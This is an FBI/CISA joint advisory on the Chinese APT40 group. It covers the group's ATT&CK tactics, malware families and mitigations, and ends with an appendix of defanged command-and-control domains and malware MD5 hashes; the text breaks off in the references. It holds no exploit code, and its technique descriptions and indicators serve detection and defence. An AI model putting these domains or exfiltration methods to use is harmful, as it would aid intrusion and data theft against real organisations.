    Original release date: July 19, 2021 | Last revised: July 20, 2021SummaryThis Joint Cybersecurity Advisory was written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to provide information on a Chinese Advanced Persistent Threat (APT) group known in open-source reporting as APT40. This advisory provides APT40’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help cybersecurity practitioners identify and remediate APT40 intrusions and established footholds. APT40—aka BRONZE MOHAWK, FEVERDREAM, G0065, Gadolinium, GreenCrash, Hellsing, Kryptonite Panda, Leviathan, MUDCARP, Periscope, Temp.Periscope, and Temp.Jumper—is located in Haikou, Hainan Province, People’s Republic of China (PRC), and has been active since at least 2009. APT40 has targeted governmental organizations, companies, and universities in a wide range of industries—including biomedical, robotics, and maritime research—across the United States, Canada, Europe, the Middle East, and the South China Sea area, as well as industries included in China’s Belt and Road Initiative. On July 19, 2021, the U.S. Department of Justice (DOJ) unsealed an indictment against four APT40 cyber actors for their illicit computer network exploitation (CNE) activities via front company Hainan Xiandun Technology Development Company (Hainan Xiandun). Hainan Xiandun employee Wu Shurong cooperated with and carried out orders from PRC Ministry of State Security (MSS) Hainan State Security Department (HSSD) intelligence officers Ding Xiaoyang, Zhu Yunmin, and Cheng Qingmin to conduct CNE. Wu’s CNE activities resulted in the theft of trade secrets, intellectual property, and other high-value information from companies and organizations in the United States and abroad, as well as from multiple foreign governments. These MSS-affiliated actors targeted victims in the following industries: academia, aerospace/aviation, biomedical, defense industrial base, education, government, healthcare, manufacturing, maritime, research institutes, and transportation (rail and shipping). Click here for a PDF version of this report. (Updated July 19, 2021)  Click here for indicators of compromise (IOCs) in STIX format. Note: to uncover malicious activity, incident responders search for IOCs in network- and host-based artifacts and assess the results—eliminating false positives during the assessment. For example, some MD5 IOCs in the STIX file identify legitimate tools—such as Putty, cmd.exe, svchost.exe, etc.—as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See Technical Approaches to Uncovering and Remediating Malicious Activity for more incident handling guidance. Technical DetailsThis Joint Cybersecurity Advisory uses the MITRE ATT&CK® framework, version 9. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques. APT40 [G0065] has used a variety of tactics and techniques and a large library of custom and open-source malware—much of which is shared with multiple other suspected Chinese groups—to establish initial access via user and administrator credentials, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. Table 1 provides details on these tactics and techniques. Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity. Table 1: APT40 ATT&CK Tactics and Techniques Tactics Activities and Techniques  Reconnaissance [TA0043]  and Resource Development [TA0042] Gathered victim identity information [T1589] by collecting compromised credentials [T1589.001]  Acquire infrastructure [T1583] to establish domains that impersonate legitimate entities [T1583.001], aka ‘typosquatting’, to use in watering hole attacks and as command and control (C2) [TA0011] infrastructure Establish new [T1585.002] and compromise existing [T1586.002] email and social media accounts [1585.001] to conduct social engineering attacks  Initial Access [TA0001] External remote services (e.g., virtual private network [VPN] services) [T1133] Spearphishing emails with malicious attachments [T1566.001] and links [T1566.002] Drive-by compromises [T1189] and exploitation of public-facing applications [T1190] Access to valid [T1078], compromised administrative [T1078.001] accounts  Execution [TA0002]   Command and scripting interpreters [T1059] such as PowerShell [T1059.001] Exploitation of software vulnerabilities in client applications to execute code [T1203] using lure documents that dropped malware exploiting various Common Vulnerabilities and Exposures (CVEs) User execution [T1204] of malicious files [T1204.002] and links [T1566.002] attached to spearphishing emails [T1566.001]  Persistence [TA0003],  Privilege Escalation [TA0004],  Credential Access [TA0006],  Discovery [TA0007],  and Lateral Movement [TA0008] APT40 has used a combination of tool frameworks and malware to establish persistence, escalate privileges, map, and move laterally on victim networks. Additionally, APT40 conducted internal spearphishing attacks [T1534]. BADFLICK/Greencrash China Chopper [S0020] Cobalt Strike [S0154] Derusbi/PHOTO [S0021] Gh0stRAT [S0032] GreenRAT jjdoor/Transporter jumpkick Murkytop (mt.exe) [S0233] NanHaiShu [S0228] Orz/AirBreak [S0229] PowerShell Empire [S0363] PowerSploit [S0194] Server software component: Web Shell [TA1505.003]  Defense Evasion [TA0005],  Command and Control [TA0011],  Collection [TA0009],  and Exfiltration [TA0010]   Use of steganography [T1027.003] to hide stolen data inside other files stored on GitHub Protocol impersonation [T1001.003] by using Application Programming Interface (API) keys for Dropbox accounts in commands to upload stolen data to make it appear that the activity was a legitimate use of the Dropbox service Protocol tunneling [T1572] and multi-hop proxies [T1090.003], including the use of Tor [S0183] Use of domain typosquatting for C2 infrastructure [T1583.001] Archive [T1560], encrypt [T1532], and stage collected data  locally [T1074.001] and remotely [T1074.002] for exfiltration Exfiltration over C2 channel [T1041] MitigationsNetwork Defense-in-Depth Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk. The following guidance may assist organizations in developing network defense procedures. Patch and Vulnerability Management Install vendor-provided and verified patches on all systems for critical vulnerabilities, prioritizing timely patching of internet-connected servers and software processing internet data—such as web browsers, browser plugins, and document readers. Ensure proper migrating steps or compensating controls are implemented for vulnerabilities that cannot be patched in a timely manner. Maintain up-to-date antivirus signatures and engines. Routinely audit configuration and patch management programs to ensure the ability to track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors’ operations and protect resources and information systems. Review the articles in the References section for more information on Chinese APT exploitation of common vulnerabilities. Protect Credentials Strengthen credential requirements, regularly change passwords, and implement multi-factor authentication to protect individual accounts, particularly for webmail and VPN access and for accounts that access critical systems. Do not reuse passwords for multiple accounts.  Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands such as net, ipconfig, and ping. Enforce principle of least privilege. Network Hygiene and Monitoring Actively scan and monitor internet-accessible applications for unauthorized access, modification, and anomalous activities.  Actively monitor server disk use and audit for significant changes. Log Domain Name Service (DNS) queries and consider blocking all outbound DNS requests that do not originate from approved DNS servers. Monitor DNS queries for C2 over DNS. Develop and monitor the network and system baselines to allow for the identification of anomalous activity. Audit logs for suspicious behavior. Identify and suspend access of users exhibiting unusual activity. Use allowlist or baseline comparison to monitor Windows event logs and network traffic to detect when a user maps a privileged administrative share on a Windows system. Leverage multi-sourced threat-reputation services for files, DNS, URLs, IP addresses, and email addresses. Network device management interfaces—such as Telnet, Secure Shell (SSH), Winbox, and HTTP—should be turned off for wide area network (WAN) interfaces and secured with strong passwords and encryption when enabled. When possible, segment critical information on air-gapped systems. Use strict access control measures for critical data.  APPENDIX: APT40 Indicators of Compromise APT40 used the following domains, file names, and malware MD5 hash values to facilitate the CNE activity outlined in this CSA between 2009 through 2018.   Domains airbusocean[.]com https://pastebin[.]com/vfb5mbbu pacifichydrologic[.]org cargillnotice[.]com huntingtomingalls[.]com philippinenewss[.]com ccidmeekparry[.]info indiadigest[.]in philstarnotice[.]com ccvzvhjhdf[.]website jack-newnb[.]com porndec143.chickenkiller[.]com cdigroups[.]com kAty197.chickenkiller[.]com santaclarasystem[.]us checkecc[.]com louisdreyfu[.]com scsnewstoday[.]com chemscalere[.]com mail2.ignorelist[.]com secbkav[.]com cnnzapmeta[.]com masterroot[.]pw Soure7788.chickenkiller[.]com corycs[.]com microsql-update[.]info tccoll[.]com deltektimes[.]com mihybb[.]com teledynegroup[.]com Engaction[.]com mlcdailynews[.]com teledyneinstrument[.]com ens-smithjonathan.rhcloud[.]com movyaction[.]net testdomain2019.chickenkiller[.]com fishgatesite.wordpress[.]com msusanode[.]com thestar[.]live goo2k88yyh2.chickenkiller[.]com newbb-news[.]com thrivedataview[.]com gttdoskip[.]com nfmybb[.]com thyssemkrupp[.]com http://gkimertds.wordpress[.]com/feed/ nmw4xhipveaca7hm[.]onion.link/en_US/all.js thyssenkrupp-marinesystems[.]org http://stackoverflow[.]com/users/3627469/angle-swift nobug[.]uk.to togetno992.mooo[.]com http://stackoverflow[.]com/users/3804206/swiftr-angle notesof992.wordpress[.]com tojenner97.chickenkiller[.]com http://stackoverflow[.]com/users/3863346/gkimertdssdads onlinenewspapers[.]club trafficeco[.]com vser.mooo[.]com onlineobl[.]com transupdate[.]com https://pastebin[.]com/p1mktQpD oyukg43t[.]website troubledate[.]com ultrasocial[.]info wsmcoff[.]com xbug.uk[.]to usdagroup[.]com www.yorkshire-espana-sa[.]com/english/servicios/ yootypes[.]com   https://github[.]com/slotz/sharp-loader/commit/f9de338fb474fd970a7375030642d04179b9245d     MD5 Malware Hashes (Updated July 19, 2021) Note: to uncover malicious activity, incident responders search for indicators of compromise (IOCs) in network- and host-based artifacts and assess the results—eliminating false positives during the assessment. For example, some MD5 IOCs in the table below identify legitimate tools—such as PuTTY, cmd.exe, svchost.exe, etc.—as indicators of compromise. Although the tools themselves are not malicious, APT40 attackers placed and used them from non-standard folders on victim systems during computer intrusion activity. If a legitimate tool is identified by an incident responder, then the location of the tool should be assessed to eliminate false positives or to uncover malicious activity. See Technical Approaches to Uncovering and Remediating Malicious Activity for more incident handling guidance.   01234c0e41fc23bb5e1946f69e6c6221 018d3c34a296edd32e1b39b7276dcf7f 019b68e26df8750e2f9f580b150b7293 01fa52a4f9268948b6c508fef0377299 022bd2040ec0476d8eb80d1d9dc5cc92 039d9ca446e79f2f4310dc7dcc60ec55 043f6cdca33ce68b1ebe0fd79e4685af 04918772a2a6ccd049e42be16bcbee39 04dc4ca70f788b10f496a404c4903ac6 060067666435370e0289d4add7a07c3b 062c759d04106e46e027bbe3b93f33ef 07083008885d2d0b31b137e896c7266c 079068181a728d0d603fe72ebfc7e910 0803f8c5ee4a152f2108e64c1e7f0233 09143a14272a29c56ff32df160dfdb30 0985f757b1b51533b6c5cf9b1467f388 09aab083fb399527f8ff3065f7796443 0b7bb3e23a1be2f26b9adf7004fc6b52 0b9a614a2bbc64c1f32b95988e5a3359 0bbe092a2120b1be699387be16b5f8fb 0bbe769505ca3db6016da400539f77aa 0c3c00c01f4c4bad92b5ba56bd5a9598 0c4fa4dfbe0b07d3425fea3efe60be1c 0ca936a564508a1f9c91cb7943e07c30 0d69eefede612493afd16a7541415b95 0da08b4bfe84eacc9a1d9642046c3b3c 0dd7f10fdf60fc36d81558e0c4930984 0e01ec14c25f9732cc47cf6344107672 10191b6ce29b4e2bddb9e57d99e6c471 105757d1499f3790e69fb1a41e372fd9 207e3c538231eb0fd805c1fc137a7b46 20e52d2d1742f3a3caafbac07a8aa99a 226042db47bdd3677bd16609d18930bd 22823fed979903f8dfe3b5d28537eb47 2366918da9a484735ec3a9808296aab8 239a22c0431620dc937bc36476e5e245 2499390148fc99a0f38148655d8059e7 24dbcd8e8e478a35943a05c7adfc87cc 25a06ab7675e8f9e231368d328d95344 25b79ba11f4a22c962fea4a13856da7f 25fc4713290000cdf01d3e7a0cea7cef 2639805ae43e60c8f04955f0fe18391c 270df5aab66c4088f8c9de29ef1524b9 280e5a3b9671db31cf003935c34f8cf9 28366de82d9c4441f82b84246369ad3b 28628f709a23d5c02c91d6445e961645 28c6f235946fd694d2634c7a2f24c1ba 29c1b4ec0bc4e224af2d82c443cce415 2b8a06d1de446db3bbbd712cdb2a70ce 2bf998d954a88b12dbec1ee96b072cb9 2c408385acdb04f0679167223d70192b 2c9737c6922b6ca67bf12729dcf038f9 2dd9aab33fcdd039d3a860f2c399d1b1 2de0e31fda6bc801c86645b37ee6f955 2e5b59c62e6e2f3b180db9453968d817 2ee7168c0cc6e0df13d0f658626474bb 2eee367a6273ce89381d85babeae1576 2f0a52ce4f445c6e656ecebbcaceade5 2f9995bc34452c789005841bc1d8da09 30701b1d1e28107f8bd8a15fcc723110 31a72e3bf5b1d33368202614ffd075db 3389dae361af79b04c9c8e7057f60cc6 33d18e29b4ecc0f14c20c46448523fc8 46e80d49764a4e0807e67101d4c60720 480f3a13998069821e51cda3934cc978 48101bbdd897877cc62b8704a293a436 48548309036005b16544e5f3788561dc 4a23e0f2c6f926a41b28d574cbc6ac30 4ab825dc6dabf9b261ab1cf959bfc15d 4b18b1b56b468c7c782700dd02d621f4 4b93159610aaadbaaf7f60bea69f21a4 4beb3f7fd46d73f00c16b4cc6453dcdb 4dd6eab0fa77adb41b7bd265cfb32013 4e79e2cade96e41931f3f681cc49b60a 4ef1c48197092e0f3dea0e7a9030edc8 503f8dc2235f96242063b52440c5c229 50527c728506a95b657ec4097f819be6 5064dc5915a46bfa472b043be9d0f52f 513f559bf98e54236c1d4379e489b4bc 51e21a697aec4cc01e57264b8bfaf978 51f31ed78cec9dbe853d2805b219e6e7 52b0f7d77192fe6f08b03f0d4ea48e46 53ceeaf0a67239b3bc4b533731fd84af 56a9ff904b78644dee6ef5b27985f441 56b18ba219c8868a5a7b354d60429368 56d6d3aa1297c62c6b0f84e5339a6c22 57849bb3949b73e2cd309900adafc853 5826e0bd3cd907cb24c1c392b42152ca 5875dfe9a15dd558ef51f269dcc407b5 58e7fd4530a212b05481f004e82f7bc1 5957ef4b609ab309ea2f17f03eb78b2d 5984955cbc41b1172ae3a688ab0246c5 59ce71ffb298a5748c3115bc834335bf 5a8d488819f2072caed31ead6aeaf2fc 5acac898428f6d20f6f085d79d86db9c 5b2cddac9ebd7b0cd3f3d3ac15026ffb 6f6d12da9e5cf8b4a7f26e53cc8e9fbd 700d2582ccb35713b7d1272aa7cfc598 70206725df8da51f26d6362e21d8fadb 70e0052d1a2828c3da5ae3c90bc969ea 7204c1f6f1f4698ac99c6350f4611391 72a7fd2b3d1b829a9f01db312fdd1cd7 7327993142260cee445b846a12cf4e85 7525bc47e2828464ce07fa8a0db6844f 76adaa87f429111646a27c2e60bda61e 76c5dca8dc9b1241b8c9a376abab0cc5 782202b09f72b3cfdc93ffb096ca27de 7836c4a36cc66d4bcbd84abb25857d21 78a0af31a5c7e4aee0f9acde74547207 7969dc3c87a3d5e672b05ff2fe93f710 7a09bf329b0b311cc552405a38747445 7a63ea3f49a96fa0b53a84e59f005019 7b3f959ab775032a3ca317ebb52189c4 7b710f9731ad3d6e265ae67df2758d50 7bd10b5c8de94e195b7da7b64af1f229 7c036ba51a3818ddc8d51cf5a6673da4 7c49efe027e489134ec317d54de42def 7d63f39fb0100a51ba6d8553ef4f34de 7ef6802fc9652d880a1f3eaf944ce4a3 7f7d726ea2ed049ab3980e5e5cb278a3 7fe679c2450c5572a45772a96b15fcb1 83076104ae977d850d1e015704e5730a 8361b151c51a7ad032ad20cecf7316f4 838ceb02081ac27de43da56bec20fc76 84865f8f1a2255561175ab12d090da7c 8520062de440b75f65217ff2509120f7 85862c262c087dd4470bb3b055ef8ea5 85e5b11d79a7570c73d3aa96e5a4e84d 85ecef9ca15e25835a9300a85f9bcd2a 9d3fd2ff608e79101b09db9e361ea845 9d5206f692577d583b93f1c3378a7a90 9e592d0918c029aa49635f03947026e8 9f847b3618b31ef05aebd81332067bd8 9fdd77dc358843af3d7b3f796580c29d a025881cd4ae65fab39081f897dc04fd a0e3561633bdf674b294094ffa06a362 a13715be3d6cbd92ed830a654d086305 a2256f050d865c4335161f823b681c24 a26e600652c33dd054731b4693bf5b01 a2c66a75211e05b20b86dd90ba534792 a2cb95be941b94f5488eab6c2eec7805 a320510258668504ed0140e7b58ee31e a34db95c0fcb78d9c5452f81254224eb a3c0151e0b6289376f383630a8014722 a42a91354d605165d2c1283b6b330539 a4711b8414445d211826b4da3f39de0a a4a70ce528f64521c3cd98dce841f6f3 a5ac89845910862cfef708b20acd0e44 a67fcb5dcfc9e3cfbfd7890e65d4f808 a68bf5fce22e7f1d6f999b7a580ae477 a6b9bbb87eb08168fc92271f69fa5825 a6cab9f2e928d71ed8ecf2c28f03a9a2 a7e4f42ad70ddd380281985302573491 a83b1aed22de71baee82e426842eeb48 a91dca76278cf4f4155eb1b0fc427727 a96dca187c3c001cad13440c3f7e77e8 aa73e7056443f1dd02480a22b48bdd46 aaafb1eeee552b0b676a5c6297cfc426 ab662cee6419327de86897029a619aeb ab8f72562d02156273618d1f3746855c abdb86d8b58b7394be841e0a4da9bec7 ace585625de8b3942cc3974cf476f8de beea0da01409b73be94b8a3ef01c4503 befc121916f9df7363fead1c8554df9a bf250a8c0c9a820cd1a21e3425acfe37 bfb0dcd9ef6ac6e016a8a5314d4ef637 bff56d7e963ea28176b0bcb60033635d c05e5bc5adb803b8a53cff7f95621c73 c0ad63a680fbdc75d54b270cbedb4739 c0d9f3a67a8df0ed737ceb9e15bacc47 c112456341a1c5519e7039ce0ba960fa c161f10fccecec67c589cdd24a05f880 c183e7319f07ccc591954068e15095db c2e023b46024873573db658d7977e216 c380675a29f47dba0b1401c7f8e149dc c3996bf709cad38d58907da523992e3b c583ae5235ddea207ac11fff4af82d9b c71f125fb385fed2561f3870b4593f18 c75a2b191da91114ceea80638bc54030 c78ee46ffbe5dd76d84fb6a74bf21474 c79b27fe1440b11a99a5611c9d6c6a78 c808d2ed8bb6b2e3c06c907a01b73d06 c8930a4fd33dcf18923d5cf0835272bd c8940976a63366f39cfcdc099701093b c89e8f0bc93d472a4f863a5fa7037286 c8a850a027fa4a3cdae7f87cc1c71ba0 cab21cb7ba1c45a926b96a38b0bdaaef cbe63b9c0c9ac6e8c0f5b357df737c5e cbfc1587f89f15a62f049e9e16cccf68 cd049c2b76c73510ae70610fd1042267 cd058dd28822c72360bc9950a6c56c45 cd427b4afea8032c77e907917608148a cd81267e9c82d24a9f40739fa6bf1772 cdc22f7913eb93d77d629e59ac2dc46a cdc585a1fd677da07163875cd0807402 e0b7e6c17339945bba43b8992a143485 e119a70f50132ae3afba3995fdf1aca6 e1512a0bf924c5a2b258ec24e593645a e195d22652b01a98259818cfbab98d33 e1ab3358b5356adefaffbc15bc43a3f9 e1b840bbf5b54aeb19e6396cab8f4c6a e26a29c0fc11cfb92936ab3374730b79 e284c25c50ba59d07a4fa947dc1a914a e3867f6e964a29134c9ea2b63713f786 e3eb703ef415659f711b6bc5604e131e e498718fd286aca7bb78858f4636f2db e4d2c63a73a0f1c6b5e60bde81ac0289 e5478fb5e8d56334d19d43cae7f9224a e5f7efcee5b15cf95a070a5cd05dbda9 e6348ee5beb9c581eeeaf4e076c5d631 e637f47c4f17c01a68539fcfcc4bc44f e63fbc864b7911be296c8ee0798f6527 e68f9b39caf116fb108ccb5c9c4ce709 e6a757114c0940b6d63c6a5925ade27f e6adc73df12092012f8cd246ba619f90 e8881037f684190d5f6cc26aab93d40f e890fa6fd8a98fec7812d60f65bf1762 e8bc927ee0ae288609e1c37665a3314e e8e73156316df88dee28214fb203658b e957c36c9d69d6a8256b6ddf7f806f56 e9ce9b35e2386bf442e22a49243a647e eadcae9ecba1097571c8d08e9b1c1a9c eb06648b43d34f20fc1c40e509521e99 eb5e5db77540516e6400a7912ad0ef0d eb5e999753f5ea094d59bdae0c66901c eb5ee94048730b321e35394a0fb10a5d eb64867dc48f757f0afe05dbf605b72d eb88f415336f0dccedfc93405330c561 fae03ff044d6bb488e1a6f1c6428c510 fc2142bd72bd520338f776146903be67 fc9b8262905a80cc5381d520813d556d fccd3de1df131f9d74949d69426c24af fcd912fd7ed80e2cdf905873c6ced4ad ff804e266a83974775814870cc49b66b 11166f8319c08c70fc886433a7dac92d 1223302912ec70c7c8350268a13ad226 139e071dd83304cdcfd5280022a0f958 13c93dc9186258d6c335b16dc7bb3c8c 14e2b0e47887c3bfbddb3b66012cb6e8 15437cfedfc067370915864feec47678 15e1816280d6c2932ff082329d0b1c76 166694d13ac463ea1c2bed64fbbb7207 16a344cd612cca4f0944ba688609e3ac 16c0011ea01c4690d5e76d7b10917537 1734a2b176a12eba8b74b8ca00ef1074 18144e860d353600bbd2e917aed21fde 1815c3a7a4a6d95f9298abb5855a3701 181a5b55b7987b62b5236965f473ba3b 18c26c5800e9e2482f1507c96804023e 1932ce50b7b6c88014cf082228486e5c 1af78c50aca90ee3d6c3497848ac5705 1b44fb4aaff71b1f96cd049a9461eaf5 1bb8f32e6e0e089d6a9c10737cf19683 1c35a87f61953baace605fff1a2d0921 1c945a6b0deccc6cd2f63c31f255d0ec 1cb216777039fe6a8464fc6a214c3c86 1d3a10846819a07eef66deefcc33459a 1dd6c80b4ea5d83aff4480dcbbef520c 1e91f0f52994617651e9b4a449af551a 1eb568559e335b3ed78588e5d99f9058 1ef9c42efe6e9a08b7ebb16913fa0228 1f2befede815fcf65c463bf875fcf497 1f9bdc0435ff0914605f01db8ca77a65 1ffd883095ff3279b31650ca3a50ad3c 34521c0f78d92a9d95e4f3ff15b516db 34681367cbcc3933f0f4b36481bde44e 34aa195c604d0725d7dd2aa4cc4efe28 354b95e858bcaced369ecbfdec327e2b 35f456afbe67951b3312f3b35d84ff0a 3647d11c155d414239943c8c23f6e8ec 37578c69c515f1d0d49769930fba25ce 375cbb0a88111d786c33510bff258a21 37b9b4ed979bd2cf818e2783499bfb5e 3810a18650dbacecd10d257312e92f61 3975740f65c2fa392247c60df70b1d6d 3a4ec0d0843769a937b5dadbe8ea56b1 3ab6bf23d5d244bc6d32d2626bd11c08 3bf8bb90d71d21233a80b0ec96321e90 3c2fe2dbdf09cfa869344fdb53307cb2 3c3d453ecf8cc7858795caece63e7299 3cbb46065f3e1dccbd707c340f38ce6b 3cf9dc0fdc2a6ab9b6f6265dc66b0157 3e89c56056e5525bf4d9e52b28fbbca7 3eb6f85ac046a96204096ab65bbd3e7e 3f50eedf4755b52aa7a7b740bd21daa6 3fefa55daeb167931975c22df3eca20a 4012acd80613aaa693a5d6cd4e7239ba 40528e368d323db0ac5c3f5e1efe4889 407c1ea99677615b80b2ffa2ed81d513 417949c717f78dc9e55ca81a5f7ade3e 4260e71d89f622c6a3359c5556b3aad7 429c10429a2ebb5f161e04159a59cf5b 4315975499cdc50098dbdb5b8aa4a199 44fa9c5df4ae20c50313aae02ba8fb95 4519b5d443a048a8599144900c4e1f28 45eb058edde4e5755a5ea1aff3ce3db7 460dc00ce690efacb5db8273c80e2b23 5b3050df93629f2f6cb3801ed19963c5 5b37ac4d642b96c4bf185c9584c0257a 5b3e945cd32a380f09ea98746f570758 5b72df8f6c110ae1d603354fcd8fe104 5c6f5cd81b099014718056e86b510fa2 5d63a3a02df2beda9d81f53abbd8264a 5d9c3cb239fa24bed2781bcf2898f153 5e353d1d17720c0f7c93f763e3565b3f 5f1c7f267fbe12210d3c80944f840332 5f393838220a6bf0cd9fd59c7cf97f5b 5f771966ef530ee0c2b42ef5cc46ad3a 6034ff91b376d653dc30f79664915b4e 603935efa89d93ea39b4b4d4a52ec529 607ea06890a6eedd723f629133576f20 60b2ce5ef4a076d1fa8675b584c27987 60cff7381b8fb64602816f9e5858930b 614909c72fa811ae41ea3d9b70122cee 6372d578e881abf76a4ec61e7a28da7d 63bf28f5dc6925a94c8b4e033a95be10 646cbeb4233948560ac50de555ea85ca 64db8e54d9a2daaa6d9cf156a8b73c18 675fe822243dfd1c3ace2a071d0aa6dd 67dbecfb5e0f2f729e57d0f1eda82c67 685cbba8cf2584a3378d82dec65aa0bb 693a4c2fcaa67fb87e62f150fb65e00e 6ad33ab8b9ff3f02964a8aab2a40ebb5 6b540be7ac7159104b0ffa536747f1bf 6b7276e4aa7a1e50735d2f6923b40de4 6b930be55ed4bf8e16b30eadc3873dfd 6c67f275d50f6bfee4848de6d4911931 6c9cfada134ede220b75087c7698ebf2 6e843ef4856336fe3ef4ed27a4c792b1 6e97bf1b7c44edc66622b43e81105779 86e50d6dc28283dbd295079252787577 870fbad5b9a54cb6720c122d1fa321ec 88b3b94574ba1eeb711a66eb04021eed 8956a045306b672d3cc852419a72c4b0 8a9ac1b3ef2bf63c2ddfadbbbfd456b5 8b3b96327fbddebefe727ac2edad5714 8baa499b3e2f081ff47f8cf06a5e7809 8bc20fcd09adb7ea86dda2c57477633b 8be0c21b6ee56d0f68e0d90f7d0a26d7 8c80dd97c37525927c1e549cb59bcbf3 8d2416d9f6926fb0dc12ab5dafef691d 8d74922b2b31354ce588cefac71d9a9b 8e8fb7632c3a7e96cf0ea5299d564018 8ee6c9e1adb71b2623d5e7aa45df5f4d 8efaa987959ef95179a0f5be05c10faf 8fbf53f77c98daba277dae7661b86f02 8fc825df73977eeffaaa1587565f7505 90a3e3a2049c6eb9e39d113d9451a83f 932d355d9f2df2e8d8449d85454fc983 9450980a4413dfdbc60a62b257a7b019 947892152b8419a2dfe498be5063c1da 94d42ff06a588587131c2cd8a9b2fe96 95c15b7961e2d6fad96defa7ff2c6272 96ba4bf00d8b4acee9f550286610dcc7 97004f1962e2aed917dc2be5c908278f 972077c1bb73ca78b7cad4ac6d56c669 991ebcd03ace627093acc860fae739b5 99949240bc4eae33cac4bbb93b72349d 9a0a8048d53dedc763992fff32584741 9a0e3e80cd7c21812de81224f646715e 9a61ed5721cf4586abd1d49e0da55350 9b26999182ea0c2b2cac91919697289e 9c656ce22c93ca31c81ff8378a0a91ee ace620a0cc2684347e372f7e40e245d5 ad3b9e45192ec7c8085c3588cacb9c58 adb4f6ecb67732b7567486f0cee6e525 afa03ddb9fc64a795aadb6516c3bc268 b0269263ce024fc9de19f8f30bd51188 b04e895827c24070eb7082611ab79676 b059c9946ff67c62c074d6d15f356f6e b07299a907a4732d14da32b417c08af3 b1dadfcf459f8447b9ec44d8767da36d b2f1d2fefe9287f3261223b4b8219d03 b36f3e12cb88499f8795b8740ae67057 b4204f08c1a29fd4434e28b6219bfbc6 b4878c233d7f776a407f55a27b5effbc b6c12d88eeb910784d75a5e4df954001 b7ab5c6926f738dbe8d3a05cb4a1b4f5 b80dcd50e27b85d9a44fc4f55ff0a728 b8a61b1fda80f95a7dcdb0137bc89f67 b9642c1b3dbcccc9d84371b3163d43e0 b9647f389978f588d977ef6ef863938f b977bed98ae869a9bb9bf725215ef8e5 b9b627c470de997c01fdef4511029219 ba629216db6cf7c0c720054b0c9a13f3 badf0957c668d9f186fb218485d0d0f6 bb165b815e09fe95fa9282bce850528d bbfb478770a911cf055b8dfd8dcb36e4 bc4c189e590053d2cf97569c495c9610 bc9089c39bcdb1c3ef2e5bd25c77ed68 bd42303e7c38486df2899b0ccf3ce8f7 bd452dc2f9490a44bcff8478d875af4b bd6031dd85a578edf0bf1560caf36e02 bd63832e090819ea531d1a030fb04e9b be39ff1ec88a1429939c411113b26c02 be88741844bf7c47f81271270abe82dc ce26e91fc13ccb1be4b6bf6f55165410 ce449d7cb0a11b53b0513dde3bd57b1c ceba742bccb23304cf05d6c565dc53f8 cebe44b8a9a2d6e15a03d40d9e98e0ed cf946bc0faecb2dc8e8edc9e6ce2858f d09fcd9fa9ed43c9f28bcd4bd4487d22 d0b5c11ee5df0d78bdde3fdc45eaf21d d0d8243943053256bc1196e45fbf92d2 d0efc042ba4a6b207cf8f5b6760799d8 d20d01038e6ea10a9dcc72a88db5e048 d31596fe58ca278be1bb46e2a0203b34 d3df8c426572a85f3afa46e4cd2b66cd d59a77a8da7bec1f4bad7054a41b3232 d76b1c624e9227131a2791957955dddc d79477c9c688a8623930f4235c7228f6 d8a483d21504e73f0ba4b30bc01125d3 da46994fee26782605842005aabcd2fe daa232882b74d60443dfec8742401808 dab45ac39e34cfee60dcb005c3d5a668 dbc583d6d5ec8f7f0c702b209af975e2 dbe92b105f474efc4a0540673da0eb9c dbee8be5265a9879b61853cd9c0e4759 dc15ca49b39d1d17b22ec7580d32d905 dc386102060f7df285e9498f320f10e0 dd43cd0eddbb6f7cb69b1f469c37ec35 dd4e0f997e0b2cc9df28dca63ded6816 ddbdc6a3801906de598531b5b2dac02a dde4ff4e41f86426051f15da48667f5f ddecce92a712327c4068fabf0e1a7ff1 de608439f2bcc097b001d352b427bb68 deeb9b4789ac002aa8b834da76e70d74 df6475642f1fe122df3d7292217f1cff e011784958e7a00ec99b8f2320e92bf4 ec4cdc752c2ecd0d9f97491cc646a269 edb648f6c3c2431b5b6788037c1cd8ef ee3e297abd0a5b943dce46f33f3d56fb ee4862bc4916fc22f219e1120bea734a ef14448bf97f49a2322d4c79e64bb60b ef2738889e9d041826d5c938a256bc45 ef6fcdd1b55adf8ad6bcdf3d93fd109e efb5499492f08c1f10fecdeb703514d5 f0098aab593b65d980061a2df3a35c21 f073de9c169c8fcb2de5b811bff51cee f0881d5a7f75389deba3eff3f4df09ac f172ad4e906d97ed8f071896fc6789dc f2b6bffa2c22420c0b1c848b673055ed f446d8808a14649bddcc412f9e754890 f4dbe32f3505bc17364e2b125f8dd6df f4dd628f6c0bc2472d29c796ee38bf46 f4e67343e13c37449ada7335b9c53dd1 f53e332b0a6dbe8d8d3177e93b70cb1e f5ae03de0ad60f5b17b82f2cd68402fe f5ce889a1fa751b8fd726994cdb8f97e f5fdbfce1a5d2c000c266f4cd180a78d f7202dea71cc638e0c2dbeb92c2ce279 f7cef381c4ee3704fc8216f00f87552a f7ffbbbc68aadcbfbace55c58b6da0a7 f8b91554d221fe8ef4a4040e9516f919 f906571d719828f0f4b6212fc2aa7705 f9155052a43832061357c23de873ff9f f9abacc459e5d50d8582e8c660752c4e f9f608407d551f49d632bd6bd5bd7a56 f9fc9359dc5d1d0ac754b12efb795f79 fa27742b87747e64c8cb0d54aa70ef98 fa3c8d91ef4a8b245033ddb9aa3054a2 fad93907d5587eb9e0d8ebc78a5e19c2             Contact Information To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at CISAServiceDesk@cisa.dhs.gov. References DOJ Press Release Talos Intelligence: China Chopper Still Active 9 Years Later CISA China Cyber 